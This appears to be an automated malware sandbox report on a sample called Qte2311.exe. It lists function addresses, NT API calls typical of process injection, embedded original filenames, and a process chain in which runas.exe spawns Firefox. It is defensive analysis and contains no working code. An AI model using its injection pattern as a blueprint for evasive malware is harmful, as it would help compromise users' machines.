Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0190EE26 3_2_0190EE26
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01850E59 3_2_01850E59
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0185B1B0 3_2_0185B1B0
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0188516C 3_2_0188516C
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0183F172 3_2_0183F172
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0191B16B 3_2_0191B16B
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018FF0CC 3_2_018FF0CC
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018570C0 3_2_018570C0
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0190F0E0 3_2_0190F0E0
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_019070E9 3_2_019070E9
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0189739A 3_2_0189739A
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0190132D 3_2_0190132D
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0183D34C 3_2_0183D34C
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018552A0 3_2_018552A0
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0186B2C0 3_2_0186B2C0
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018F12ED 3_2_018F12ED
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0186D2F0 3_2_0186D2F0
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018ED5B0 3_2_018ED5B0
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_019195C3 3_2_019195C3
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01907571 3_2_01907571
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0190F43F 3_2_0190F43F
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01841460 3_2_01841460
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0190F7B0 3_2_0190F7B0
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_019016CC 3_2_019016CC
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01895630 3_2_01895630
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018E5910 3_2_018E5910
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01859950 3_2_01859950
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0186B950 3_2_0186B950
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018538E0 3_2_018538E0
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018BD800 3_2_018BD800
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0186FB80 3_2_0186FB80
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0188DBF9 3_2_0188DBF9
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018C5BF0 3_2_018C5BF0
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0190FB76 3_2_0190FB76
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018EDAAC 3_2_018EDAAC
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01895AA0 3_2_01895AA0
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018F1AA3 3_2_018F1AA3
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018FDAC6 3_2_018FDAC6
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01907A46 3_2_01907A46
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0190FA49 3_2_0190FA49
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018C3A6C 3_2_018C3A6C
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0186FDC0 3_2_0186FDC0
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01853D40 3_2_01853D40
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01901D5A 3_2_01901D5A
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01907D73 3_2_01907D73
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0190FCF2 3_2_0190FCF2
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018C9C32 3_2_018C9C32
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01851F92 3_2_01851F92
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0190FFB1 3_2_0190FFB1
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01813FD2 3_2_01813FD2
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01813FD5 3_2_01813FD5
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0190FF09 3_2_0190FF09
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01859EB0 3_2_01859EB0
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050B0535 5_2_050B0535
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_05170591 5_2_05170591
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_05154420 5_2_05154420
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_05162446 5_2_05162446
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_0515E4F6 5_2_0515E4F6
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050D4750 5_2_050D4750
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050B0770 5_2_050B0770
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050AC7C0 5_2_050AC7C0
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050CC6E0 5_2_050CC6E0
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050A0100 5_2_050A0100
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_0514A118 5_2_0514A118
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_05138158 5_2_05138158
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_051641A2 5_2_051641A2
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_051701AA 5_2_051701AA
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_051681CC 5_2_051681CC
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_05142000 5_2_05142000
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_0516A352 5_2_0516A352
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_051703E6 5_2_051703E6
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050BE3F0 5_2_050BE3F0
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_05150274 5_2_05150274
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_051302C0 5_2_051302C0
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050BAD00 5_2_050BAD00
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_0514CD1F 5_2_0514CD1F
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050C8DBF 5_2_050C8DBF
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050AADE0 5_2_050AADE0
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050B0C00 5_2_050B0C00
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_05150CB5 5_2_05150CB5
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050A0CF2 5_2_050A0CF2
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_05152F30 5_2_05152F30
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050F2F28 5_2_050F2F28
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050D0F30 5_2_050D0F30
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_05124F40 5_2_05124F40
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_0512EFA0 5_2_0512EFA0
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050A2FC8 5_2_050A2FC8
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_0516EE26 5_2_0516EE26
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050B0E59 5_2_050B0E59
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_0516CE93 5_2_0516CE93
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050C2E90 5_2_050C2E90
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_0516EEDB 5_2_0516EEDB
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050C6962 5_2_050C6962
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050B29A0 5_2_050B29A0
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_0517A9A6 5_2_0517A9A6
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050BA840 5_2_050BA840
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050B2840 5_2_050B2840
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050968B8 5_2_050968B8
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050DE8F0 5_2_050DE8F0
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_0516AB40 5_2_0516AB40
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_05166BD7 5_2_05166BD7
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050AEA80 5_2_050AEA80
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_05167571 5_2_05167571
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_0514D5B0 5_2_0514D5B0
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_051795C3 5_2_051795C3
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_0516F43F 5_2_0516F43F
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050A1460 5_2_050A1460
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_0516F7B0 5_2_0516F7B0
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050F5630 5_2_050F5630
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_051616CC 5_2_051616CC
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050E516C 5_2_050E516C
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_0509F172 5_2_0509F172
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_0517B16B 5_2_0517B16B
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050BB1B0 5_2_050BB1B0
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050B70C0 5_2_050B70C0
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_0515F0CC 5_2_0515F0CC
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_0516F0E0 5_2_0516F0E0
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_051670E9 5_2_051670E9
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_0516132D 5_2_0516132D
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_0509D34C 5_2_0509D34C
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050F739A 5_2_050F739A
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050B52A0 5_2_050B52A0
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050CB2C0 5_2_050CB2C0
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_051512ED 5_2_051512ED
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050CD2F0 5_2_050CD2F0
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050B3D40 5_2_050B3D40
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_05161D5A 5_2_05161D5A
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_05167D73 5_2_05167D73
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050CFDC0 5_2_050CFDC0
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_05129C32 5_2_05129C32
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_0516FCF2 5_2_0516FCF2
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_0516FF09 5_2_0516FF09
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050B1F92 5_2_050B1F92
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_0516FFB1 5_2_0516FFB1
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_05073FD5 5_2_05073FD5
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_05073FD2 5_2_05073FD2
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050B9EB0 5_2_050B9EB0
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_05145910 5_2_05145910
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050B9950 5_2_050B9950
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050CB950 5_2_050CB950
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_0511D800 5_2_0511D800
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050B38E0 5_2_050B38E0
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_0516FB76 5_2_0516FB76
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050CFB80 5_2_050CFB80
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_05125BF0 5_2_05125BF0
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050EDBF9 5_2_050EDBF9
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_05167A46 5_2_05167A46
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_0516FA49 5_2_0516FA49
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_05123A6C 5_2_05123A6C
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050F5AA0 5_2_050F5AA0
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_05151AA3 5_2_05151AA3
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_0514DAAC 5_2_0514DAAC
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_0515DAC6 5_2_0515DAC6
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_02FA13F0 5_2_02FA13F0
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_02F9C670 5_2_02F9C670
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_02F9C668 5_2_02F9C668
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_02F9AA54 5_2_02F9AA54
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_02FA2B40 5_2_02FA2B40
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_02FA2B3B 5_2_02FA2B3B
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_02F9C890 5_2_02F9C890
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_02F9A910 5_2_02F9A910
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_02FB6C30 5_2_02FB6C30
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_02F91115 5_2_02F91115
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_02FA1B79 5_2_02FA1B79
Source: C:\Windows\SysWOW64\runas.exe Code function: String function: 0509B970 appears 262 times
Source: C:\Windows\SysWOW64\runas.exe Code function: String function: 050E5130 appears 58 times
Source: C:\Windows\SysWOW64\runas.exe Code function: String function: 0511EA12 appears 86 times
Source: C:\Windows\SysWOW64\runas.exe Code function: String function: 0512F290 appears 103 times
Source: C:\Windows\SysWOW64\runas.exe Code function: String function: 050F7E54 appears 107 times
Source: C:\Users\user\Desktop\Qte2311.exe Code function: String function: 018CF290 appears 103 times
Source: C:\Users\user\Desktop\Qte2311.exe Code function: String function: 01885130 appears 58 times
Source: C:\Users\user\Desktop\Qte2311.exe Code function: String function: 018BEA12 appears 86 times
Source: C:\Users\user\Desktop\Qte2311.exe Code function: String function: 0183B970 appears 262 times
Source: C:\Users\user\Desktop\Qte2311.exe Code function: String function: 01897E54 appears 107 times
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0040A023 NtSuspendThread, 3_2_0040A023
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_004280C3 NtClose, 3_2_004280C3
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0040B0A3 NtReadFile, 3_2_0040B0A3
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0040B923 NtAllocateVirtualMemory, 3_2_0040B923
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0040A223 NtGetContextThread, 3_2_0040A223
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0040AA33 NtCreateSection, 3_2_0040AA33
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0040AC53 NtMapViewOfSection, 3_2_0040AC53
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0040A423 NtSetContextThread, 3_2_0040A423
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0040B513 NtDelayExecution, 3_2_0040B513
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0040AE73 NtCreateFile, 3_2_0040AE73
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0040A623 NtResumeThread, 3_2_0040A623
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01882B60 NtClose,LdrInitializeThunk, 3_2_01882B60
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01882DF0 NtQuerySystemInformation,LdrInitializeThunk, 3_2_01882DF0
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01882C70 NtFreeVirtualMemory,LdrInitializeThunk, 3_2_01882C70
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018835C0 NtCreateMutant,LdrInitializeThunk, 3_2_018835C0
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01884340 NtSetContextThread, 3_2_01884340
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01884650 NtSuspendThread, 3_2_01884650
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01882B80 NtQueryInformationFile, 3_2_01882B80
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01882BA0 NtEnumerateValueKey, 3_2_01882BA0
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01882BE0 NtQueryValueKey, 3_2_01882BE0
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01882BF0 NtAllocateVirtualMemory, 3_2_01882BF0
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01882AB0 NtWaitForSingleObject, 3_2_01882AB0
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01882AD0 NtReadFile, 3_2_01882AD0
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01882AF0 NtWriteFile, 3_2_01882AF0
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01882DB0 NtEnumerateKey, 3_2_01882DB0
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01882DD0 NtDelayExecution, 3_2_01882DD0
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01882D00 NtSetInformationFile, 3_2_01882D00
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01882D10 NtMapViewOfSection, 3_2_01882D10
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01882D30 NtUnmapViewOfSection, 3_2_01882D30
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01882CA0 NtQueryInformationToken, 3_2_01882CA0
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01882CC0 NtQueryVirtualMemory, 3_2_01882CC0
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01882CF0 NtOpenProcess, 3_2_01882CF0
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01882C00 NtQueryInformationProcess, 3_2_01882C00
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01882C60 NtCreateKey, 3_2_01882C60
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01882F90 NtProtectVirtualMemory, 3_2_01882F90
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01882FA0 NtQuerySection, 3_2_01882FA0
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01882FB0 NtResumeThread, 3_2_01882FB0
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01882FE0 NtCreateFile, 3_2_01882FE0
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01882F30 NtCreateSection, 3_2_01882F30
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01882F60 NtCreateProcessEx, 3_2_01882F60
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01882E80 NtReadVirtualMemory, 3_2_01882E80
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01882EA0 NtAdjustPrivilegesToken, 3_2_01882EA0
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01882EE0 NtQueueApcThread, 3_2_01882EE0
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01882E30 NtWriteVirtualMemory, 3_2_01882E30
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01883090 NtSetValueKey, 3_2_01883090
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01883010 NtOpenDirectoryObject, 3_2_01883010
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018839B0 NtGetContextThread, 3_2_018839B0
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01883D10 NtOpenProcessToken, 3_2_01883D10
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01883D70 NtOpenThread, 3_2_01883D70
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050E4650 NtSuspendThread,LdrInitializeThunk, 5_2_050E4650
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050E4340 NtSetContextThread,LdrInitializeThunk, 5_2_050E4340
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050E2D10 NtMapViewOfSection,LdrInitializeThunk, 5_2_050E2D10
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050E2D30 NtUnmapViewOfSection,LdrInitializeThunk, 5_2_050E2D30
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050E2DD0 NtDelayExecution,LdrInitializeThunk, 5_2_050E2DD0
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050E2DF0 NtQuerySystemInformation,LdrInitializeThunk, 5_2_050E2DF0
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050E2C60 NtCreateKey,LdrInitializeThunk, 5_2_050E2C60
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050E2C70 NtFreeVirtualMemory,LdrInitializeThunk, 5_2_050E2C70
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050E2CA0 NtQueryInformationToken,LdrInitializeThunk, 5_2_050E2CA0
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050E2F30 NtCreateSection,LdrInitializeThunk, 5_2_050E2F30
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050E2FB0 NtResumeThread,LdrInitializeThunk, 5_2_050E2FB0
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050E2FE0 NtCreateFile,LdrInitializeThunk, 5_2_050E2FE0
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050E2E80 NtReadVirtualMemory,LdrInitializeThunk, 5_2_050E2E80
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050E2EE0 NtQueueApcThread,LdrInitializeThunk, 5_2_050E2EE0
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050E2B60 NtClose,LdrInitializeThunk, 5_2_050E2B60
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050E2BA0 NtEnumerateValueKey,LdrInitializeThunk, 5_2_050E2BA0
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050E2BE0 NtQueryValueKey,LdrInitializeThunk, 5_2_050E2BE0
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050E2BF0 NtAllocateVirtualMemory,LdrInitializeThunk, 5_2_050E2BF0
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050E2AD0 NtReadFile,LdrInitializeThunk, 5_2_050E2AD0
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050E2AF0 NtWriteFile,LdrInitializeThunk, 5_2_050E2AF0
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050E35C0 NtCreateMutant,LdrInitializeThunk, 5_2_050E35C0
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050E39B0 NtGetContextThread,LdrInitializeThunk, 5_2_050E39B0
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050E2D00 NtSetInformationFile, 5_2_050E2D00
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050E2DB0 NtEnumerateKey, 5_2_050E2DB0
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050E2C00 NtQueryInformationProcess, 5_2_050E2C00
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050E2CC0 NtQueryVirtualMemory, 5_2_050E2CC0
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050E2CF0 NtOpenProcess, 5_2_050E2CF0
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050E2F60 NtCreateProcessEx, 5_2_050E2F60
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050E2F90 NtProtectVirtualMemory, 5_2_050E2F90
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050E2FA0 NtQuerySection, 5_2_050E2FA0
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050E2E30 NtWriteVirtualMemory, 5_2_050E2E30
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050E2EA0 NtAdjustPrivilegesToken, 5_2_050E2EA0
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050E2B80 NtQueryInformationFile, 5_2_050E2B80
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050E2AB0 NtWaitForSingleObject, 5_2_050E2AB0
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050E3010 NtOpenDirectoryObject, 5_2_050E3010
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050E3090 NtSetValueKey, 5_2_050E3090
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050E3D10 NtOpenProcessToken, 5_2_050E3D10
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050E3D70 NtOpenThread, 5_2_050E3D70
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_02FB46A0 NtCreateFile, 5_2_02FB46A0
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_02FB47C0 NtReadFile, 5_2_02FB47C0
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_02FB4A00 NtAllocateVirtualMemory, 5_2_02FB4A00
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_02FB48E0 NtClose, 5_2_02FB48E0
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_02FB4870 NtDeleteFile, 5_2_02FB4870
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_02FB48DD NtClose, 5_2_02FB48DD
Source: Qte2311.exe, 00000000.00000002.1662192785.00000000046FE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs Qte2311.exe
Source: Qte2311.exe, 00000000.00000002.1664028645.0000000007F90000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs Qte2311.exe
Source: Qte2311.exe, 00000000.00000002.1660974972.00000000015CE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs Qte2311.exe
Source: Qte2311.exe, 00000003.00000002.1744906371.000000000193D000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Qte2311.exe
Source: Qte2311.exe, 00000003.00000002.1744564742.00000000013B7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameRUNAS.EXEj% vs Qte2311.exe
Source: Qte2311.exe Binary or memory string: OriginalFilenamercQ.exe> vs Qte2311.exe
Source: Qte2311.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Qte2311.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\Qte2311.exe C:\Users\user\Desktop\Qte2311.exe
Source: C:\Users\user\Desktop\Qte2311.exe Process created: C:\Users\user\Desktop\Qte2311.exe C:\Users\user\Desktop\Qte2311.exe
Source: C:\Program Files (x86)\jFJKUzqwKIBdWDkcySLyDBhTBgNTKdOJMfgYJclsrVfAJDMiwJDDVHpOzszTWBY\SoZyKEDyfEWrMWEFcBvwSAkabc.exe Process created: C:\Windows\SysWOW64\runas.exe C:\Windows\SysWOW64\runas.exe
Source: C:\Windows\SysWOW64\runas.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe
